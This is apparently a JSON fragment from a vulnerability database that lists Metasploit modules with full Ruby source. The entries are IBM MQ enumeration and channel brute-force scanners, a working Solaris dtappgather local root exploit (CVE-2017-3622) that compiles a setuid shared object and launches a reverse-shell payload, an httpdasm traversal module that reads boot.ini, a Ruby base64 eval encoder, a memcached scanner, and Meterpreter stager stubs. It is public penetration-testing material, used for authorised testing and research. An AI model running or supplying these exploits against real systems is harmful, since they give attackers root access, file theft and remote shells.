\"\\x20\"*(20-datastore['CHANNEL'].length.to_i)\n if channel_type == 0\n chan_type = \"\\x26\"\n elsif channel_type == 1\n chan_type = \"\\x07\"\n elsif channel_type == 2\n chan_type = \"\\x08\"\n end\n\n packet = \"\\x54\\x53\\x48\\x20\" + \t\t# StructID\n \"\\x00\\x00\\x01\\x0c\" + \t\t\t# MQSegmLen\n \"\\x02\" + \t\t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t\t# SegmType\n \"\\x01\" + \t\t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +\t# LUW Ident\n 
\"\\x22\\x02\\x00\\x00\" + \t\t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t\t# StructId\n \"\\x0d\" + \t\t\t\t\t# FAP level\n chan_type + \t\t\t\t# CapFlag1 - Message Type\n \"\\x00\" + \t\t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" + \t\t\t\t# Reserved\n \"\\x32\\x00\" + \t\t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" + \t\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" + \t\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" + \t\t\t# SeqWrapVal\n chan + \t\t\t\t\t# Channel Name\n \"\\x87\" + \t\t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t\t# ECapFlag2\n \"\\x5b\\x01\" +\t\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x2c\\x01\\x00\\x00\" + \t\t\t# HBInterval\n \"\\x8a\\x00\" + \t\t\t\t# EFLLength\n \"\\x00\" + \t\t\t\t\t# IniErrFlg2\n \"\\x55\" + \t\t\t\t\t# Reserved1\n \"\\x00\\xff\" +\t\t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t\t# MsgCprsLst2\n \"\\x00\\x00\" + \t\t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t\t# SSLKeyRst\n \"\\x00\\x00\\x00\\x00\" + \t\t\t# ConvBySkt\n \"\\x05\" + \t\t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t\t# Reserved3\n \"\\x10\\x13\\x00\\x00\" + \t\t\t# ProcessId\n \"\\x01\\x00\\x00\\x00\" + \t\t\t# ThreadId\n \"\\x01\\x00\\x00\\x00\" + \t\t\t# TraceId\n \"MQMM09000000\" +\t\t \t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 + \t\t\t# MQM ID\n \"\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +\t# Unknown1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# Unknown2\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" + \t# Unknown3\n \"\\x00\\x00\\x00\\x00\\x00\" \t\t\t# Unknown4\n end\n\n\n def run_host(ip)\n chan = datastore['CHANNEL']\n if chan.length > 20\n print_error(\"Channel name must be less than 20 characters.\")\n raise Msf::OptionValidateError.new(['CHANNEL'])\n end\n ports = 
Rex::Socket.portspec_crack(datastore['PORTS'])\n while(ports.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_port = ports.shift\n break if not this_port\n t << framework.threads.spawn(\"Module(#{self.refname})-#{ip}:#{this_port}\", false, this_port) do |port|\n begin\n data_recv = \"\"\n 3.times do |channel_type|\n data_recv = send_packet(ip,port,channel_type)\n if data_recv.nil?\n next\n end\n # check if CHANNEL_WRONG_TYPE error received and retry with different type\n if data_recv[data_recv.length-4...data_recv.length] != \"\\x02\\x00\\x00\\x00\"\n break\n end\n end\n if data_recv.nil?\n print_status(\"No response received. Try increasing TIMEOUT value.\")\n print_line\n next\n end\n status_code = data_recv[-4..-1]\n if status_code == \"\\x18\\x00\\x00\\x00\"\n print_status(\"Channel Requires SSL. Could not get more information.\")\n print_line\n end\n if not data_recv[0...3].include?('TSH')\n next\n end\n if status_code == \"\\x01\\x00\\x00\\x00\"\n print_error('Channel \"' + chan + '\" does not exist.')\n print_line\n end\n if status_code == \"\\x02\\x00\\x00\\x00\" or status_code == \"\\x06\\x00\\x00\\x00\"\n print_error('Unsupported channel type. 
Try a different channel.')\n print_line\n end\n if data_recv.length < 180\n next\n end\n qm_name = data_recv[76...124].delete(' ')\n mq_version = data_recv[180...188].scan(/../).collect{|x| x.to_i}.join('.')\n print_good(\"#{ip}:#{port} - Queue Manager Name: #{qm_name} - MQ Version: #{mq_version}\")\n print_line\n end\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def send_packet(ip,port,channel_type)\n begin\n timeout = datastore['TIMEOUT'].to_i\n packet = create_packet(channel_type)\n s = connect(false,\n {\n 'RPORT' => port,\n 'RHOST' => ip,\n }\n )\n s.put(packet)\n data = s.get_once(-1,timeout)\n return data\n rescue ::Rex::ConnectionRefused\n print_error(\"#{ip}:#{port} - TCP Port Closed.\")\n print_line\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n print_error(\"#{ip}:#{port} - Connection Failed.\")\n print_line\n rescue ::Interrupt\n raise $!\n ensure\n if s\n disconnect(s) rescue nil\n end\n end\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/ibm_mq_enum.rb"}, {"lastseen": "2019-11-29T22:02:43", "bulletinFamily": "exploit", "description": "This module uses a dictionary to bruteforce MQ channel names. 
For all identified channels it also returns if SSL is used and whether it is a server-connection channel.\n", "modified": "2018-11-20T22:24:17", "published": "2018-10-28T15:22:27", "id": "MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Channel Name Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Channel Name Bruteforce',\n 'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent channel names to check\", 10]),\n OptPath.new('CHANNELS_FILE',\n [ true, \"The file that contains a list of channel names\"]\n )])\n end\n\n def create_packet(chan)\n packet = \"\\x54\\x53\\x48\\x20\"+ \t# StructID\n \"\\x00\\x00\\x01\\x0c\"+ \t\t# MQSegmLen\n \"\\x02\" +\t\t\t \t# Byte Order\n \"\\x01\" +\t\t\t \t# SegmType\n \"\\x01\" +\t\t\t\t# CtlFlag1\n \"\\x00\" +\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\t# LUWIdent\n \"\\x22\\x02\\x00\\x00\"+\t\t\t# Encoding\n \"\\xb5\\x01\" +\t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" +\t\t# StructID\n \"\\x0d\" +\t\t\t\t# FAP Level\n \"\\x26\" +\t\t\t\t# CapFlag1 - Channel Type\n \"\\x00\" +\t\t\t\t# ECapFlag1\n \"\\x00\" +\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x32\\x00\" +\t\t\t# MaxMsgBtch\n 
\"\\xec\\x7f\\x00\\x00\" +\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" +\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" +\t\t# SegWrapVal\n + chan + \t\t\t\t# Channel name\n \"\\x20\" +\t\t\t\t# CapFlag2\n \"\\x20\" +\t\t\t\t# ECapFlag2\n \"\\x20\\x20\" +\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x20\\x20\\x20\\x20\" +\t\t# HBInterval\n \"\\x20\\x20\" +\t\t\t# EFLLength\n \"\\x20\" +\t\t\t\t# IniErrFlg2\n \"\\x20\" +\t\t\t\t# Reserved1\n \"\\x20\\x20\" +\t\t\t# HdrCprLst\n \"\\x20\\x20\\x20\\x20\\x2c\\x01\\x00\\x00\"+ # MSGCprLst1\n \"\\x8a\\x00\\x00\\x55\\x00\\xff\\x00\\xff\"+ # MsgCprLst2\n \"\\xff\\xff\" +\t\t\t# Reserved2\n \"\\xff\\xff\\xff\\xff\" +\t\t# SSLKeyRst\n \"\\xff\\xff\\xff\\xff\" +\t\t# ConvBySKt\n \"\\xff\" +\t\t\t\t# CapFlag3\n \"\\xff\" +\t\t\t\t# ECapFlag3\n \"\\xff\\xff\" +\t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" +\t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" +\t\t# ThreadId\n \"\\x00\\x00\\x05\\x00\" +\t\t# TraceId\n \"\\x00\\x00\\x10\\x13\\x00\\x00\" + \t# ProdId\n \"\\x01\\x00\\x00\\x00\\x01\\x00\" + \t# ProdId\n \"MQMID\" + \"\\x20\"*43 +\t\t# MQM Id\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\"+ # Unknown\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x00\\x00\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\"+ # Unknown\n \"\\x00\\x00\\x00\\x00\\x00\\x00\"\t\t# Unknown\n end\n\n\n def run_host(ip)\n @channels = []\n @unencrypted_mqi_channels = []\n begin\n channel_list\n rescue ::Rex::ConnectionRefused\n fail_with(Failure::Unreachable, \"TCP Port closed.\")\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n fail_with(Failure::Unreachable, \"Connection Failed.\")\n rescue ::Exception => e\n fail_with(Failure::Unknown, e)\n end\n if(@channels.empty?)\n print_status(\"#{ip}:#{rport} No channels found.\")\n else\n print_good(\"Channels found: #{@channels}\")\n 
print_good(\"Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.channels'\n )\n print_line\n end\n end\n\n def channel_list\n channel_data = get_channel_names\n while (channel_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_channel = channel_data.shift\n if this_channel.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_channel) do |channel|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{channel}...\"\n if channel.length.to_i > 20\n print_error(\"Channel names cannot exceed 20 characters. Skipping.\")\n next\n end\n chan = channel + \"\\x20\"*(20-channel.length.to_i)\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(create_packet(chan))\n data = s.get_once(-1,timeout)\n if data.nil?\n print_status(\"No response received. Try increasing timeout.\")\n next\n end\n if not data[0...3].include? 'TSH'\n next\n end\n if data[-4..-1] == \"\\x01\\x00\\x00\\x00\" # NO_CHANNEL code\n next\n end\n if data[-4..-1] == \"\\x18\\x00\\x00\\x00\" # CIPHER_SPEC code\n print_status(\"Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A\")\n elsif data[-4..-1] == \"\\x02\\x00\\x00\\x00\" # CHANNEL_WRONG_TYPE code\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: False\")\n else\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: True\")\n @unencrypted_mqi_channels << channel\n end\n @channels << channel\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_channel_names\n if(! 
@common)\n File.open(datastore['CHANNELS_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb"}, {"lastseen": "2019-11-23T04:39:04", "bulletinFamily": "exploit", "description": "This module exploits a directory traversal vulnerability in the `dtappgather` executable included with Common Desktop Environment (CDE) on unpatched Solaris systems prior to Solaris 10u11 which allows users to gain root privileges. dtappgather allows users to create a user-owned directory at any location on the filesystem using the `DTUSERSESSION` environment variable. This module creates a directory in `/usr/lib/locale`, writes a shared object to the directory, and runs the specified SUID binary with the shared object loaded using the `LC_TIME` environment variable. 
This module has been tested successfully on: Solaris 9u7 (09/04) (x86); Solaris 10u1 (01/06) (x86); Solaris 10u2 (06/06) (x86); Solaris 10u4 (08/07) (x86); Solaris 10u8 (10/09) (x86); Solaris 10u9 (09/10) (x86).\n", "modified": "2019-01-10T19:19:14", "published": "2018-09-18T07:23:10", "id": "MSF:EXPLOIT/SOLARIS/LOCAL/EXTREMEPARR_DTAPPGATHER_PRIV_ESC", "href": "", "type": "metasploit", "title": "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Solaris::Priv\n include Msf::Post::Solaris::System\n include Msf::Post::Solaris::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Solaris 'EXTREMEPARR' dtappgather Privilege Escalation\",\n 'Description' => %q{\n This module exploits a directory traversal vulnerability in the\n `dtappgather` executable included with Common Desktop Environment (CDE)\n on unpatched Solaris systems prior to Solaris 10u11 which allows users\n to gain root privileges.\n\n dtappgather allows users to create a user-owned directory at any\n location on the filesystem using the `DTUSERSESSION` environment\n variable.\n\n This module creates a directory in `/usr/lib/locale`, writes a shared\n object to the directory, and runs the specified SUID binary with the\n shared object loaded using the `LC_TIME` environment variable.\n\n This module has been tested successfully on:\n\n Solaris 9u7 (09/04) (x86);\n Solaris 10u1 (01/06) (x86);\n Solaris 10u2 (06/06) (x86);\n Solaris 10u4 (08/07) (x86);\n Solaris 10u8 (10/09) (x86);\n Solaris 10u9 (09/10) (x86).\n },\n 'References' =>\n [\n ['BID', '97774'],\n ['CVE', '2017-3622'],\n ['EDB', '41871'],\n ['URL', 
'https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh'],\n ['URL', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html']\n ],\n 'Notes' => { 'AKA' => ['EXTREMEPARR'] },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Shadow Brokers', # exploit\n 'Hacker Fantastic', # dtappgather-poc.sh\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => 'Apr 24 2017',\n 'Privileged' => true,\n 'Platform' => ['solaris', 'unix'],\n 'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],\n 'Targets' => [['Auto', {}]],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',\n 'WfsDelay' => 10,\n 'PrependFork' => true\n },\n 'DefaultTarget' => 0))\n register_options [\n # Some useful example SUID executables:\n # * /usr/bin/at\n # * /usr/bin/cancel\n # * /usr/bin/chkey\n # * /usr/bin/lp\n # * /usr/bin/lpset\n # * /usr/bin/lpstat\n # * /usr/lib/lp/bin/netpr\n # * /usr/sbin/lpmove\n OptString.new('SUID_PATH', [true, 'Path to suid executable', '/usr/bin/at']),\n OptString.new('DTAPPGATHER_PATH', [true, 'Path to dtappgather executable', '/usr/dt/bin/dtappgather'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def suid_bin_path\n datastore['SUID_PATH']\n end\n\n def dtappgather_path\n datastore['DTAPPGATHER_PATH']\n end\n\n def mkdir(path)\n vprint_status \"Creating directory '#{path}'\"\n cmd_exec \"mkdir -p '#{path}'\"\n register_dir_for_cleanup path\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_compile(path, data)\n upload \"#{path}.c\", data\n\n output = cmd_exec \"PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -fPIC -shared -g -lc -o #{path} #{path}.c\"\n unless 
output.blank?\n print_error output\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\n end\n\n register_file_for_cleanup path\n end\n\n def symlink(link_target, link_name)\n vprint_status \"Symlinking #{link_target} to #{link_name}\"\n rm_f link_name\n cmd_exec \"ln -sf #{link_target} #{link_name}\"\n register_file_for_cleanup link_name\n end\n\n def check\n [dtappgather_path, suid_bin_path].each do |path|\n unless setuid? path\n vprint_error \"#{path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{path} is setuid\"\n end\n\n unless has_gcc?\n vprint_error 'gcc is not installed'\n return CheckCode::Safe\n end\n vprint_good 'gcc is installed'\n\n version = kernel_release\n if version.to_s.eql? ''\n vprint_error 'Could not determine Solaris version'\n return CheckCode::Detected\n end\n\n unless Gem::Version.new(version).between? Gem::Version.new('5.7'), Gem::Version.new('5.10')\n vprint_error \"Solaris version #{version} is not vulnerable\"\n return CheckCode::Safe\n end\n vprint_good \"Solaris version #{version} appears to be vulnerable\"\n\n CheckCode::Appears\n end\n\n def exploit\n if is_root?\n fail_with Failure::BadConfig, 'Session already has root privileges'\n end\n\n unless [CheckCode::Detected, CheckCode::Appears].include? check\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n unless writable? 
datastore['WritableDir']\n fail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\"\n end\n\n # Remove appmanager directory and contents\n appmanager_path = '/var/dt/appconfig/appmanager'\n vprint_status \"Cleaning appmanager directory #{appmanager_path}\"\n cmd_exec \"chmod -R 755 #{appmanager_path}/*\"\n cmd_exec \"rm -rf #{appmanager_path}/*\"\n rm_f appmanager_path\n\n # Create writable directory in /usr/lib/locale\n locale_path = '/usr/lib/locale'\n locale_name = rand_text_alphanumeric 5..10\n new_dir = \"#{locale_path}/#{locale_name}\"\n vprint_status \"Creating directory #{new_dir}\"\n depth = 3\n cmd_exec \"DTUSERSESSION=. /usr/dt/bin/dtappgather\"\n depth.times do\n cmd_exec \"DTUSERSESSION=.. /usr/dt/bin/dtappgather\"\n end\n symlink locale_path, appmanager_path\n cmd_exec \"DTUSERSESSION=#{locale_name} #{dtappgather_path}\"\n unless cmd_exec(\"ls -al #{locale_path} | grep #{locale_name}\").to_s.include? locale_name\n fail_with Failure::NotVulnerable, \"Could not create directory #{new_dir}\"\n end\n\n print_good \"Created directory #{new_dir}\"\n register_dir_for_cleanup new_dir\n\n rm_f appmanager_path\n cmd_exec \"chmod 755 #{new_dir}\"\n\n # Upload and compile shared object\n base_path = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}\"\n mkdir base_path\n\n payload_name = \".#{rand_text_alphanumeric 5..10}\"\n payload_path = \"#{base_path}/#{payload_name}\"\n\n so = <<-EOF\n void __attribute__((constructor)) cons() {\n setuid(0);\n setgid(0);\n execle(\"#{payload_path}\", \"\", 0, 0);\n _exit(0);\n }\n EOF\n\n so_name = \".#{rand_text_alphanumeric 5..10}\"\n so_path = \"#{base_path}/#{so_name}\"\n upload_and_compile so_path, so\n\n vprint_status \"Writing shared objects to #{new_dir}\"\n cmd_exec \"cp '#{so_path}' '#{new_dir}/#{locale_name}.so.2'\"\n register_file_for_cleanup \"#{new_dir}/#{locale_name}.so.2\"\n cmd_exec \"cp '#{so_path}' '#{new_dir}/#{locale_name}.so.3'\"\n register_file_for_cleanup 
\"#{new_dir}/#{locale_name}.so.3\"\n\n # Upload and execute payload\n upload payload_path, generate_payload_exe\n cmd_exec \"chmod +x #{payload_path}\"\n\n print_status 'Executing payload...'\n cmd_exec \"LC_TIME=#{locale_name} #{suid_bin_path} & echo \"\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/local/extremeparr_dtappgather_priv_esc.rb"}, {"lastseen": "2019-11-23T05:39:42", "bulletinFamily": "exploit", "description": "This module allows for traversing the file system of a host running httpdasm v0.92.\n", "modified": "2019-08-15T23:10:44", "published": "2018-06-18T15:25:33", "id": "MSF:AUXILIARY/SCANNER/HTTP/HTTPDASM_DIRECTORY_TRAVERSAL", "href": "", "type": "metasploit", "title": "Httpdasm Directory Traversal", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Httpdasm Directory Traversal',\n 'Description' => %q{\n This module allows for traversing the file system of a host running httpdasm v0.92.\n },\n 'Author' =>\n [\n 'John Leitch', # EDB POC\n 'Shelby Pace' # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['EDB', '15861']\n ]\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'Path to traverse to', '%2e%2e%5c' * 8 + 'boot.ini'])\n ])\n\n end\n\n def run\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n })\n\n if res && res.code == 200\n print_status(res.body)\n path = store_loot('httpdasm.file', 'application/octet-stream', rhost, res.body)\n else\n if res\n print_error(\"Unexpected response from server: #{res.code}\")\n else\n print_error(\"The server timed out.\")\n end\n end\n 
end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb"}, {"lastseen": "2019-11-24T23:33:59", "bulletinFamily": "exploit", "description": "This encoder returns a base64 string encapsulated in eval(%(base64 encoded string).unpack(%(m0)).first).\n", "modified": "2018-04-24T16:33:27", "published": "2018-04-21T08:54:26", "id": "MSF:ENCODER/RUBY/BASE64", "href": "", "type": "metasploit", "title": "Ruby Base64 Encoder", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Encoder\n Rank = GreatRanking\n\n def initialize\n super(\n 'Name' => 'Ruby Base64 Encoder',\n 'Description' => %q{\n This encoder returns a base64 string encapsulated in\n eval(%(base64 encoded string).unpack(%(m0)).first).\n },\n 'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',\n 'License' => BSD_LICENSE,\n 'Arch' => ARCH_RUBY)\n end\n\n def encode_block(state, buf)\n %w{( ) . % e v a l u n p c k m 0 f i r s t}.each do |c|\n raise BadcharError if state.badchars.include?(c)\n end\n\n b64 = Rex::Text.encode_base64(buf)\n\n state.badchars.each_byte do |byte|\n raise BadcharError if b64.include?(byte.chr)\n end\n\n return \"eval(%(\" + b64 + \").unpack(%(m0)).first)\"\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/encoders/ruby/base64.rb"}, {"lastseen": "2019-11-30T16:03:28", "bulletinFamily": "exploit", "description": "This module can be used to discover Memcached servers which expose the unrestricted UDP port 11211. 
A basic \"version\" request is executed to obtain the version of memcached.\n", "modified": "2018-03-07T02:16:22", "published": "2018-03-07T01:54:00", "id": "MSF:AUXILIARY/SCANNER/MEMCACHED/MEMCACHED_UDP_VERSION", "href": "", "type": "metasploit", "title": "Memcached UDP Version Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n\n def initialize\n super(\n 'Name' => 'Memcached UDP Version Scanner',\n 'Description' => %q(\n This module can be used to discover Memcached servers which expose the\n unrestricted UDP port 11211. A basic \"version\" request is executed to obtain\n the version of memcached.\n ),\n 'Author' =>\n [\n 'Jon Hart <jon_hart@rapid7.com>' # Metasploit scanner module\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Jul 23, 2003',\n 'References' =>\n [\n ['URL', 'https://github.com/memcached/memcached/blob/master/doc/protocol.txt']\n ]\n )\n\n register_options(\n [\n Opt::RPORT(11211)\n ]\n )\n end\n\n def build_probe\n # Memcached version probe, per https://github.com/memcached/memcached/blob/master/doc/protocol.txt\n @memcached_probe ||= [\n rand(2**16), # random request ID\n 0, # sequence number\n 1, # number of datagrams in this sequence\n 0, # reserved; must be 0\n \"version\\r\\n\"\n ].pack(\"nnnna*\")\n end\n\n def scanner_process(data, shost, sport)\n # Check the response data for a \"VERSION\" repsonse\n if /VERSION (?<version>[\\d\\.]+)\\r\\n/ =~ data\n print_good(\"#{shost}:#{sport}/udp memcached version #{version}\")\n report_service(\n host: shost,\n proto: 'udp',\n port: rport,\n info: version,\n name: 'memcached'\n )\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/memcached/memcached_udp_version.rb"}, {"lastseen": "2019-11-27T19:27:46", "bulletinFamily": "exploit", "description": "Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)\n", "modified": "2018-02-28T02:24:51", "published": "2018-02-23T02:03:37", "id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_NAMED_PIPE", "href": "", "type": "metasploit", "title": "Windows Inject DLL, Windows x86 Bind Named Pipe Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_named_pipe'\nrequire 'msf/core/payload/windows/bind_named_pipe'\n\nmodule MetasploitModule\n\n CachedSize = 336\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindNamedPipe\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x86 Bind Named Pipe Stager',\n 'Description' => 'Listen for a pipe connection (Windows x86)',\n 'Author' => [ 'UserExistsError' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::BindNamedPipe,\n 'Convention' => 'sockedi', # hPipe\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/bind_named_pipe.rb"}, {"lastseen": "2019-12-01T13:14:05", "bulletinFamily": "exploit", "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). 
Connect back to the attacker\n", "modified": "2018-03-04T23:43:15", "published": "2018-02-04T07:01:27", "id": "MSF:PAYLOAD/WINDOWS/X64/METERPRETER/REVERSE_TCP_RC4", "href": "", "type": "metasploit", "title": "Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/x64/reverse_tcp_rc4'\n\n\nmodule MetasploitModule\n\n CachedSize = 585\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4_x64\n\n def self.handler_type_alias\n \"reverse_tcp_rc4\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'max3raza', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockrdi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb"}], "nessus": 